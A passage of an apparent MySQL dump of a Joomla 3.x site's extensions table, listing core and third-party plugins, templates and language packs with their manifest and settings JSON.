Haverbeke\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"3.15\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\"}','{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(412,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,0,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2013\",\"author\":\"Moxiecode Systems AB\",\"copyright\":\"Moxiecode Systems AB\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"tinymce.moxiecode.com\",\"version\":\"4.0.22\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"2\",\"skin\":\"2\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"lang_code\":\"en\",\"text_direction\":\"ltr\",\"content_css\":\"0\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"applet,iframe\",\"extended_elements\":\"\",\"toolbar\":\"top\",\"toolbar_align\":\"left\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"true\",\"resize_horizontal\":\"false\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"format_date\":\"%Y-%m-%d\",\"inserttime\":\"1\",\"format_time\":\"%H:%M:%S\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"media\":\"1\",\"hr\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"style\":\"1\",\"layer\":\"1\",\"xhtmlxtras\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advimage\":\"1\",\"advlink\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,1,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(414,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(415,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(416,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(417,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'{\"name\":\"plg_search_weblinks\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(423,'plg_system_p3p','plugin','p3p','system',0,1,1,0,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',9,0),(425,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(427,'plg_system_redirect','plugin','redirect','system',0,1,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(428,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(429,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',8,0),(430,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(431,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,0,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2009 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,'plg_user_profile','plugin','profile','user',0,0,1,0,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(435,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(436,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',10,0),(437,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(438,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(439,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,1,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(440,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'','{}','','',0,'0000-00-00 00:00:00',7,0),(441,'plg_content_finder','plugin','finder','content',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"1.7.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(442,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(443,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(444,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(445,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(446,'plg_finder_weblinks','plugin','weblinks','finder',0,1,1,0,'{\"name\":\"plg_finder_weblinks\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(447,'plg_finder_tags','plugin','tags','finder',0,1,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(448,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(449,'plg_authentication_cookie','plugin','cookie','authentication',0,1,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(450,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"Se[ptember 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(500,'atomic','template','atomic','',0,1,1,0,'{\"legacy\":false,\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"2.5.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(502,'bluestork','template','bluestork','',1,1,1,0,'{\"legacy\":false,\"name\":\"bluestork\",\"type\":\"template\",\"creationDate\":\"07\\/02\\/09\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"TPL_BLUESTORK_XML_DESCRIPTION\",\"group\":\"\"}','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\",\"textBig\":\"0\",\"highContrast\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(503,'beez_20','template','beez_20','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,'hathor','template','hathor','',1,1,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"hathor@tarrconsulting.com\",\"authorUrl\":\"http:\\/\\/www.tarrconsulting.com\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(505,'beez5','template','beez5','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"html5\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(600,'English (United Kingdom)','language','en-GB','',0,1,1,1,'{\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.3\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,'English (United Kingdom)','language','en-GB','',1,1,1,1,'{\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.3\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"September 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.7\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10002,'TCPDF','library','tcpdf','',0,1,1,0,'{\"legacy\":true,\"name\":\"TCPDF\",\"type\":\"library\",\"creationDate\":\"28 January 2011\",\"author\":\"Nicola Asuni\",\"copyright\":\"http:\\/\\/www.tcpdf.org\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.tcpdf.org\",\"version\":\"2.5.0\",\"description\":\"Class for generating PDF files on-the-fly without requiring external extensions.\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10003,'rsform','component','com_rsform','',1,1,0,0,'{\"legacy\":true,\"name\":\"RSForm\",\"type\":\"component\",\"creationDate\":\"05\\/08\\/2010\",\"author\":\"RSJoomla!\",\"copyright\":\"(C) 2007-2011 www.rsjoomla.com\",\"authorEmail\":\"support@rsjoomla.com\",\"authorUrl\":\"www.rsjoomla.com\",\"version\":\"1.4.0 R40\",\"description\":\"With RSForm!Pro you can quickly add forms to your Joomla! website.\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10004,'System - iBualoy 